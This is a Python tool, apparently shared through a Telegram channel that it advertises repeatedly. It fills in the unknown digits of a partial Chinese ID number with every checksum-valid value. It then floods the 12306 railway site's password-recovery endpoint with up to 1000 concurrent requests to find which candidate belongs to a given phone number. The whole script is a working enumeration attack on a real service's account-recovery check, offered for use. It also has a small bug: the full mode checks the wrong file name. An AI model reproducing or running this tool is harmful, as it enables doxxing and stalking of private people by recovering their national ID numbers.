import asyncio
import time
import itertools
from aiohttp import ClientSession, ClientTimeout

print('加入频道获取更多https://t.me/XBNP6')
print('加入频道获取更多https://t.me/XBNP6')
print('加入频道获取更多https://t.me/XBNP6')
print('加入频道获取更多https://t.me/XBNP6')
print('加入频道获取更多https://t.me/XBNP6')
print('加入频道获取更多https://t.me/XBNP6')

# ------------------------- 身份证生成模块 -------------------------
def check_id_data(n):
    """身份证校验码验证(增加月份日期校验)"""
    year = int(n[6:10])
    month = int(n[10:12])
    day = int(n[12:14])
    
    if year > 2025 or year < 1900:  # 扩展年份范围
        return False
    if month < 1 or month > 12:
        return False
    if day < 1 or day > 31:
        return False
    
    # 校验码计算
    var = [7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2]
    check_code = sum(int(n[i]) * var[i] for i in range(17)) % 11
    return ['1','0','X','9','8','7','6','5','4','3','2'][check_code] == n[17]

def generate_ids(card_pattern, gender=None):
    """生成身份证号,支持性别生成"""
    print("生成身份证号中...")
    char_sets = []
    for i, ch in enumerate(card_pattern):
        if ch == 'x':
            if i == 16:  # 性别位
                if gender == '男':
                    char_sets.append(['1', '3', '5', '7', '9'])  # 奇数
                elif gender == '女':
                    char_sets.append(['0', '2', '4', '6', '8'])  # 偶数
                elif gender == '未知':
                    char_sets.append(list("0123456789"))  # 不限制
            else:
                char_sets.append(list("0123456789"))
        else:
            char_sets.append([ch])
    
    valid_ids = []
    for combo in itertools.product(*char_sets):
        id_num = ''.join(combo)
        if len(id_num) == 18 and check_id_data(id_num):
            valid_ids.append(id_num)
    return valid_ids

# ------------------------- 12306验证模块 -------------------------
async def get_cookies(session):
    """获取cookies"""
    try:
        async with session.get(
            "https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword",
            timeout=ClientTimeout(total=10)
        ) as resp:
            if resp.status != 200:
                print(f"获取cookies失败꒦ິ^꒦ິ状态码:{resp.status}")
                return None
            return resp.cookies
    except Exception as e:
        print(f"获取cookies时发生连接错误: {str(e)}")
        return None

async def verify_id(session, phone, id_num, cookies, sem):
    """静默验证模式"""
    url = "https://kyfw.12306.cn/otn/forgetPassword/checkUserInfo"
    data = {
        "mobile_no": phone,
        "loginUserDTO.mobile_code": "86",
        "loginUserDTO.id_type_code": "1",
        "loginUserDTO.id_no": id_num
    }

    async with sem:
        for _ in range(3):
            try:
                async with session.post(url, data=data, cookies=cookies, timeout=5) as resp:
                    result = await resp.json(content_type=None)  # 忽略内容类型检查
                    if result.get('status') and not result.get('data', {}).get('errorMsg'):
                        return True, id_num
                    return False, id_num
            except:
                continue
        return False, id_num

# ------------------------- 主控制流程 -------------------------
async def verification_mode():
    """验证模式"""
    phone = input("请输入需要验证的手机号: ").strip()
    
    try:
        with open('sfz.txt', 'r', encoding='utf-8') as f:
            id_list = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print("错误:未找到sfz.txt文件")
        return
    except Exception as e:
        print(f"读取文件失败: {str(e)}")
        return
    
    if not id_list:
        print("身份证文件夹是空的啊喂!")
        return

    print("\n正在努力核验⌯>ᴗo⌯...")
    
    async with ClientSession(timeout=ClientTimeout(total=30)) as session:
        cookies = await get_cookies(session)
        if not cookies:
            print("Cold正在重新获取cookies៷>ᴗ<៷请等待恢复后使用...")
            return
        
        sem = asyncio.Semaphore(1000)  # 控制并发数
        tasks = [verify_id(session, phone, id_num, cookies, sem) for id_num in id_list]
        
        # 执行验证
        success = 0
        start = time.time()
        results = await asyncio.gather(*tasks)
        
        # 显示结果
        print("\n验证结果:")
        for valid, id_num in results:
            if valid:
                print(f"✅匹配成功✅: {id_num}")
                success += 1
        print(f"成功匹配 {success}/{len(id_list)} 耗时: {time.time()-start:.2f}秒")

def generation_mode():
    """生成模式"""
    pattern = input("请输入模糊身份证哟(x表示未知位): ").strip()
    
    if len(pattern) != 18:
        print("错误!!身份证长度必须为18位!笨蛋")
        return
    if not all(c in '0123456789xX' for c in pattern):
        print("错误:身份证只能包含数字和x")
        return
    
    # 询问性别
    gender = input("请选择性别(男/女/未知): ").strip()
    if gender not in ['男', '女', '未知']:
        print("错误:性别选择无效")
        return
    
    id_numbers = generate_ids(pattern, gender=gender)
    
    if not id_numbers:
        print("未生成有效身份证号")
        return
    
    try:
        with open('sfz.txt', 'w', encoding='utf-8') as f:
            f.write('\n'.join(id_numbers))
        print(f"已生成 {len(id_numbers)} 条身份证,保存至 sfz.txt")
    except Exception as e:
        print(f"保存文件失败: {str(e)}")

async def generate_and_verify():
    """全流程模式"""
    generation_mode()
    
    try:
        with open('6.txt', 'r', encoding='utf-8') as f:
            if not f.readlines():
                print("错误:生成的身份证文件为空")
                return
    except Exception as e:
        print(f"文件检查失败: {str(e)}")
        return
    
    await verification_mode()

if __name__ == "__main__":
    print("请选择模式:")
    print("1. 生成身份证号(补齐模式)")
    print("2. 验证身份证号(12306验证)")
    print("3. 补齐并验证(全自动流程)")
    choice = input("请输入数字选择(1/2/3): ").strip()
    
    if choice == '1':
        generation_mode()
    elif choice == '2':
        asyncio.run(verification_mode())
    elif choice == '3':
        asyncio.run(generate_and_verify())
    else:
        print("无效,使用数字选择功能𖦹‎ࡇ𖦹‎.ᐟ")
